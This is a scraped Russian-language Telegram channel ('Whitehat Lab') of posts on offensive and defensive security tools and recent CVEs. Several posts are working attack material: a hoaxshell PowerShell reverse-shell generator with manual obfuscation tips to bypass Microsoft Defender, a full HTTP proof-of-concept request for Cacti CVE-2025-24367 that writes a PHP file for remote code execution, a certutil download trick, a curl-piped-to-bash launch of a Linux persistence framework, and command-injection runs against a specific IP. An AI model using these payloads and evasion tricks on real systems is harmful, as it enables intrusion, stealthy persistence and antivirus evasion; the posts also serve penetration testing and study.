Whitehat Lab
2.04K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
⚙️ ffuf - Fuzz Faster U Fool v2.1.0

💻 Очень быстрый веб фаззер написанный на 🖼️ Go

Fuzzing
- перебор директорий, параметров, заголовков (headers)
ffuf поддерживает множество настроек, работа через прокси, различные фильтры (размер, кол-во строк, символов). GET/POST запросы.
В 💻 Kali установлен по умолчанию.

Установка:

go install github.com/ffuf/ffuf/v2@latest

Примеры использования:

ffuf -w /wordlists/rockyou.txt -u https://example.com/FUZZ
ffuf -w /wordlists/rockyou.txt -u https://example.com/page.php?FUZZ=1
ffuf -w /wordlists/rockyou.txt -u https://example.com -H "Host: FUZZ.example.com"


Основные фильтры:
fc - HTTP status (-fc 404)
fs - размер ответа (-fs 0)
fl - кол-во линий (-fl 16)
fw - кол-во слов (-fw 2)


Заворачиваем в 😈 Burp (proxy):

-x "https://127.0.0.1:8080"

Флаг -c сделает вывод цветным, рекомендую, по дефолту - False

💻 Home

#ffuf #fuzzing #fuzzer #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😁1
🏠 Кибербезопасность для новичков

7 уроков от Microsoft

Что охватывает курс 📚:

🔐 Основные концепции кибербезопасности, различия между рисками, угрозами и т.д.
🛡 Что такое меры безопасности и какие формы они могут принимать
🌐 Понимание того, что такое zero trust и почему это важно в современной кибербезопасности
🔑 Ключевые концепции и темы, связанные с идентификацией, сетевыми технологиями, операциями в области безопасности, инфраструктуры и защиты данных
🔧 Примеры инструментов, используемых для реализации мер безопасности

Чего курс не охватывает 🚫:

🚫 Как использовать конкретные инструменты безопасности
🚫 Hacking, red teaming/offensive security
🚫 Обучение стандартам соответствия

💻 Cybersecurity by microsoft

#microsoft #cybersecurity

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🥷 Autopsy v 4.22.0

Замечательный open source продукт которым пользуются кибер-криминалисты по всему миру. Это графический интерфейс для коллекции утилит под названием The Sleuth Kit (TSK)
Работает с образами дисков и не только, список поддерживаемых файловых систем: NTFS, FAT, ExFAT, UFS 1, UFS 2, EXT2FS, EXT3FS, Ext4, HFS, ISO 9660, и YAFFS2

В 🐧 Kali Linux имеется в репозиториях и ставится одной командой: sudo apt install autopsy

Также есть версии для Windows, Linux и OS X

➡️ Download
➡️ The Sleuth Kit
💻 Modules

#autopsy #sleuthkit #forensics #dfir

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🚩 Стеганография в изображениях

Основные инструменты:

😹 zsteg - комбайн по работе с PNG и BMP

gem install zsteg
zsteg -a pic.png


😹 png-parser - анализ PNG изображений

pip install --user git+https://github.com/Hedroed/png-parser
png-parser pic.png


🔠 steghide - извлекает данные из JPG

sudo apt install steghide
steghide extract -sf pic.jpg


😹 stegseek - самый быстрый брутер steghide файлов

sudo apt install ./stegseek_0.6-1.deb
stegseek pic.jpg rockyou.txt


😹 stegoveritas - очередной комбайн, разбирает по слоям, применяет кучу фильтров, результат сохраняет в отдельную директорию

pip3 install stegoveritas
stegoveritas pic.png


😹 stegsolve - Java приложение, работа со слоями, LSB, стереограмы

java -jar StegSolve.jar


🔠 exiftool - лучший инструмент по работе с метаданными

exiftool pic.png


🔠 exiftoolGUI - графический интерфейс для exiftool ( 📦 )
🔠 tweakpng - редактор метаданных в PNG ( 📦 )
🔠 pngcheck - анализатор PNG изображений

sudo apt install pngcheck
pngcheck -v pic.png


😹 stegpy - LSB

pip3 install stegpy
stegpy pic.png


🔠 OpenStego - очередная стегано утилита ( 📦 )
🔠 Magic Eye Solver - решение стереограм
🔠 Aperi Solve - веб сервис все в одном
🔠 Piet Solver - веб сервис решение Piet

#steganography #tools #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1
🏠 Living Off The Land Binaries, Scripts and Libraries

Шпаргалка по скриптам, библиотекам и бинарным файлам в ОС 🖼️ Windows

Вбиваем название утилиты и смотрим как с ней можно взаимодействовать
Например - Certutil.exe

Можем скачать файл из сети:

certutil.exe -urlcache -split -f https://7-zip.org/a/7z1604-x64.exe 7zip.exe


🪟 Lolbas

#lolbas #cheatsheet #windows #redteam

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 WADComs - это интерактивная шпаргалка, содержащая список ⚔️ RED Team инструментов с кратким описанием и командами, которые будут использоваться в средах 🏠 Windows/AD

Указываем доступный нам вид реквизитов (логин, пароль, хеш, билет и т.д.) и сервис покажет что и как мы можем использовать.

https://wadcoms.github.io

#windows #activedirectory #wadcoms #redteam

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🧩 hoaxshell

Генератор и обработчик полезной нагрузки для Windows через PowerShell. Написан на Python
Бонус: при небольшой обработке "напильником" обходим последний Defender со всеми апдейтами (см. картинку)

Установка:

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt


Примеры:
python3 hoaxshell.py -s 192.168.1.36 -iro -H "Authorization"


-i
- Invoke-RestMethod вместо Invoke-WebRequest
-r - Без кодирования в Base64
Нет смысла кодировать т.к. дорабатывать будем руками, все дефолтные методы "палятся" АВ
-o - Обфускация

Полезные ключи -ng и -lt для создания ngrok или localtunnel сессии

Ручная обфускация:

Надо заменить Invoke-RestMethod и Invoke-WebRequest на аналоги и/или напихать кавычек. Мы же любим кавычки ? 😃

Примеры:

i''nV''okE-R''eStMe''Th''oD
ir''M
i''eX
Ir''M

С реГисТром можно и нужно играться

😹 Home

#hoaxshell #powershell #python #soft #manual

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💉 Commix v4.0-stable

UPD. Большой апдейт до major ветки 4.0

Комбайн для эксплуатации Command Injection уязвимостей, написан на python 💻 Команды, ключи, вывод и все остальное очень похоже на SQLMap.

В 🐧 Kali предустановлен.

💻 Установка:

git clone https://github.com/commixproject/commix.git commix
python commix.py -h


"Детский" режим:

python commix --wizard


Обычный запуск:

python commix -u https://62.173.140.174:16016/ --data 'action='


Поддержка тамперов:

python commix -u https://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs


Список тамперов:

python commix --list-tampers

💻 Download
⚙️ Usage examples

#commix #python #pentest #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🏃 adPEAS 0.8.25

Отличный инструмент для проведения enumeration в 🏠 Active Directory

UPD. Добавили поддержку Windows 2025

Представлен в 2х вариантах, стандарт и лайт

Полная версия имеет встроенный модуль SharpHound для сбора информации в 😉 Bloodhound

Стандартный запуск:

Import-Module .\adPEAS.ps1
Invoke-adPEAS


Доступные модули:

Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках

Rights - поиск различных прав, например LAPS, DCSync и т.д.

GPO - базовая информация о групповых политиках

ADCS - информация о центрах сертификации

Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.

Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей

Accounts - информация об аккаунтах

Computer - AD DS, AD CS, Exchange серверы и т.д.

BloodHound - сборщик данных для BH


Варианты запуска:

Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor

Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'


Определенная УЗ:

$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)

Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred


Модули:

Invoke-adPEAS -Module Domain

Invoke-adPEAS -Module Rights

Invoke-adPEAS -Module GPO

Invoke-adPEAS -Module ADCS

Invoke-adPEAS -Module Creds

Invoke-adPEAS -Module Delegation

Invoke-adPEAS -Module Accounts

Invoke-adPEAS -Module Computer

Invoke-adPEAS -Module Bloodhound -Scope All


💻 Home

#soft #powershell #activedirectory #enumeration

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ Cacti CVE-2025-24367
Arbitrary File Creation leading to RCE


Позволяет аутентифицированному пользователю злоупотребить функциями создания графов и шаблонов графов для записи произвольных PHP-скриптов в корень сайта

PoC:
POST https://192.168.178.78/cacti/graph_templates.php?header=false HTTP/1.1
host: 192.168.178.78
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 804
Origin: https://192.168.178.78
Connection: keep-alive
Referer: https://192.168.178.78/cacti/graph_templates.php?action=template_edit&id=297&csrf_timeout=true&csrf_timeout=true
Cookie: CactiDateTime=Fri Jan 03 2025 14:03:51 GMT+0000 (Greenwich Mean Time); CactiTimeZone=0; Cacti=r378gdiav394djct96o26mliud; cacti_remembers=1%2C0%2C1ac46cea6e1f0225f6e52320b4d734503fac5215a76879b3cb2c939d5cc56c49
Priority: u=0

__csrf_magic=sid%3A3363ef9d47d62372302b4941b790e92f5f749d9c%2C1735913031&name=PING+-+Advanced+Ping&graph_template_id=297&graph_template_graph_id=297&save_component_template=1&title=%7Chost_description%7C+-+Advanced+Ping&vertical_label=milliseconds&image_format_id=3&height=200&width=700&base_value=1000&slope_mode=on&auto_scale_opts=1&upper_limit=10&lower_limit=0&unit_value=&unit_exponent_value=1&unit_length=&right_axis=&right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A&right_axis_format=0&right_axis_formatter=0&left_axis_formatter=0&tab_width=30&legend_position=0&legend_direction=0&rrdtool_version=1.7.2&action=save


🖥 Summary

#web #rce #cacti #cve

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️Онлайн инструменты для работы с JWT

JSON Web Token - специальный формат токена, который позволяет безопасно(в идеале 😁) передавать данные между клиентом и сервером.

Состоит из трёх частей: заголовок, пейлоад и подпись

➡️Мой любимый - https://token.dev
➡️По классике - https://jwt.io
➡️Еще неплохой вариант
➡️Отдельно декодер для Flask Session Cookie

Пример простейшей реализации на Python 🐍

import json
import hmac
import hashlib
import base64
import uuid

header = {"typ": "JWT", "alg": "HS256"}
payload = {"name": "exited3n", "isAdmin": True}
secret = str(uuid.uuid4())


def jwt_gen(header: dict, payload: dict, secret: str) -> bytes:
jwt_parts = []
json_header = json.dumps(header).encode()
json_payload = json.dumps(payload).encode()
jwt_parts.append(base64.urlsafe_b64encode(json_header))
jwt_parts.append(base64.urlsafe_b64encode(json_payload))

merge_payload_header = b'.'.join(jwt_parts)

signature = hmac.new(secret.encode(), merge_payload_header, hashlib.sha256).digest()
jwt_parts.append(base64.urlsafe_b64encode(signature))

return b'.'.join(jwt_parts)

print(f'Secret: {secret}')
print(jwt_gen(header, payload, secret))


#jwt #token #flask #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 Adalanche v2025.2.6

Обновление отличного кроссплатформенного инструмента для визуализации, построения графов, связей и исследования Active Directory.
Даст мгновенные результаты, показывая, какие разрешения имеют пользователи и группы в 💻 AD. Полезен для изучения того, кто может управлять учетными записями, машинами или всем доменом, и может использоваться для поиска и отображения неправильных конфигураций. Покажет проблемы делегирования, AD CS и многое другое.
Проект активно развивается. Написан на 💻

Отличия от 😉 BloodHound:

Не требуется Neo4J, Python
Не требуется предварительной настройки
Для построения запросов используется расширенный LDAP синтаксис
Наличие бесплатной и коммерческой версии


Машина в домене:

adalanche.exe collect activedirectory


Машина не в домене:

adalanche.exe collect activedirectory --ignorecert --domain contoso.local --authdomain CONTOSO --username dom_user --password P@ssw0rd


Будет создана папка data

Анализ:

adalanche.exe analyze


💻 Github
💻 Documentation
➡️ Commercial version

#adalanche #golang #soft #activedirectory

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍1
✏️ 🔄 ImHex v1.37.4

Обновление открытого шестнадцатеричного редактора для работы в 💻 🐧💻
ImHex содержит всевозможные инструменты и функции, такие как средство просмотра энтропии и встроенный интерфейс для дизассемблера Capstone
Имеет пользовательский язык шаблонов, используемый для определения структур и типов данных, который обеспечивает автоматический анализ файлов и аннотацию
Написан на 💻 Распространяется по лицензии GPL-2.0

💻 Github
💻 Download
➡️ Home
➡️ Web version
➡️ Docs

#imhex #soft #cplusplus

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔓 Lastpass

В далеком 2014 году зарегистрировал аккаунт в данном сервисе, сколько там сохранено записей трудно даже представить, а теперь и не узнать вовсе.

Вчера вечером не получилось войти с валидными кредами и я попробовал зарегистрировать новый аккаунт на свой же 📧email адрес и о чудо, поздравили с успешной регистрацией и предложили добавить свой первый пароль 😭

Знаю, что их несколько раз удачно "пентестили" 😂 И предпосылки сменить данный сервис имелись, но как всегда было лень и не доходили руки, теперь дошли.

Сказать что я чуть [цензура], ничего не сказать, доверие к подобным сервисам упало до нуля и было принято волевое решение использовать - 🔓 KeePassXC и держать все свои данные в локальной базе.

Благо с памятью у меня все в порядке и почти все необходимое помню наизусть, что не вспомню, буду восстанавливать.

Ну а вы друзья, товарищи, чем подобным пользуетесь ?

#keepassxc #passwords

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️SploitScan v0.13.0

Нашел отличный и удобный инструмент, предназначенный для поиска эксплоитов, известных уязвимостей и их эксплуатации с поддержкой 👩‍💻 AI (ChatGPT, Gemini, Grok и DeepSeek) и функцией импорта из популярных 😁 сканеров

Установка в 🐧 Debian like:

sudo apt install sploitscan


В репозиториях не самая новая версия, поэтому рекомендую ставить с гитхаба.

😹 Github:

git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt


PyPi:

pip install --user sploitscan


Источники PoC'ов:

➡️GitHub
➡️ExploitDB
➡️VulnCheck (нужен free API key)
➡️Packet Storm
➡️Nuclei


Импорт из:

Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)


В конфиге указываем API ключи поддерживаемых сервисов (config.json)

{
"vulncheck_api_key": "",
"openai_api_key": "",
"google_api_key": "",
"grok_api_key": "",
"deepseek_api_key": ""
}


Поиск по CVE:

sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413


Поиск по ключевым словам:

sploitscan -k "Outlook Express"


Импорт и экспорт:

sploitscan --import-file path/to/yourfile.nessus --type nessus

sploitscan CVE-2024-1709 -e {json,csv,html}


Помощь AI:

sploitscan --ai openai CVE-2024-21413

┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...


#sploitscan #poc #cve #python

💻 Github

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 Базовый софт

🤩 Пару лет назад уже делал подобный пост, но с той поры многое изменилось, решил обновить список используемого мной софта на повседневной основе.
Конечно, тут далеко не всё, с чем приходится иметь дело, но базовые утилиты и инструменты я постарался указать. Пишите в комментарии свои любимые инструменты и сервисы.

📌OS's:

💻 Manjaro ▪️ 🐧 Kali ▪️ 💻 Windows 11

📌Core:

➡️GNU core utilities
➡️Python + Pycharm
➡️Vivaldi | Firefox
➡️Virtual Box | Vmware Workstation
➡️OpenSSH

📌Base:

➡️Xfce + Qterminal
➡️Zsh + Oh my zsh
➡️Windows terminal + Oh my posh
➡️Total commander
➡️Midnight commander
➡️Sublime text
➡️Telegram
➡️Wireguard
➡️KeePassXC
➡️LDPlayer
➡️Obsidian
➡️Bandicam
➡️qBittorrent
➡️ShareX
➡️Clipdiary
➡️Sysinternals

📌 Tools:

➡️Sqlmap
➡️Ffuf
➡️Nmap | RustScan
➡️Pwncat-cs
➡️Burp suite
➡️Dbeaver
➡️Autopsy
➡️Hex editor neo
➡️SploitScan

📌Online services

➡️Perplexity
➡️Blackbox
➡️Sploitus
➡️WADComs
➡️CyberChef

#soft #kit #tools

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🛡️ PANIX - Persistence Against *NIX v2.1.0

Мощный, модульный и легко настраиваемый framework для закрепления в 🐧ОС Linux, предназначенный для пентестеров, инженеров по обнаружению, CTF энтузиастов и других. Уделено особое внимание функциональности, что делает его важным инструментом для понимания и реализации широкого спектра методов закрепления.

Запуск:

curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash


😹 Home

#soft #shell #linux #pentest

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 Cyberdefense Active Directory Mindmap v2025.03

Невероятно подробная шпаргалка по пентесту AD инфраструктуры. Лучше не встречал. Рекомендую!

АХТУНГ! Огромное разрешение 19148x7303

➡️ SVG
➡️ PNG

😹 Home

#activedirectory #pentest #cheatsheet #redteam #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️CVE-2025-29927 - Next.js and the corrupt middleware

Очередная уязвимость в популярном JS фреймворке

Next.js использует хедер x-middleware-subrequest, для предотвращения рекурсивных запросов

Уязвимость позволяет обойти проверки авторизации, выполняемые в промежуточном программном обеспечении Next.js, что потенциально позволяет злоумышленникам получить доступ к конфиденциальным данным

Недостаток устранен в версиях 12.3.5, 13.5.9, 14.2.25 и 15.2.3

Подробный разбор (на англ.)

➡️Summary

🔄 Nuclei шаблон:

id: nextjs-CVE-2025-29927

info:
name: Next.js - CVE-2025-29927
author: 6mile
severity: critical
description: |
Next.js has a critical vulnerability that allows attackers to bypass authentication entirely when the application utilizes middleware for authorization.
reference:
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
- https://nvd.nist.gov/vuln/detail/CVE-2025-29927
- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
- https://zeropath.com/blog/nextjs-middleware-cve-2025-29927-auth-bypass
metadata:
verified: true
vendor: vercel
product: next.js
framework: node.js
shodan-query:
- http.html:"/_next/static"
- x-powered-by: next.js
- x-nextjs-cache:
- cpe:"cpe:2.3:a:zeit:next.js"
fofa-query: body="/_next/static"
tags: nextjs,cve-2025-29927

http:
- method: GET
path:
- "{{BaseURL}}"

matchers-condition: and
matchers:
- type: word
name: Next.js
part: header
words:
- 'x-nextjs-cache:'
- 'x-powered-by: next.js'
- 'x-nextjs-prerender:'
- 'x-nextjs-stale-time:'
- 'set-cookie: NEXT_LOCALE='
condition: or
case-insensitive: true

- type: word
name: Next.js Middleware
part: header
words:
- 'x-middleware-rewrite:'
- 'x-middleware-set-cookie:'
condition: or
case-insensitive: true

- type: status
status:
- 200


#web #pentest #nextjs #cve

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM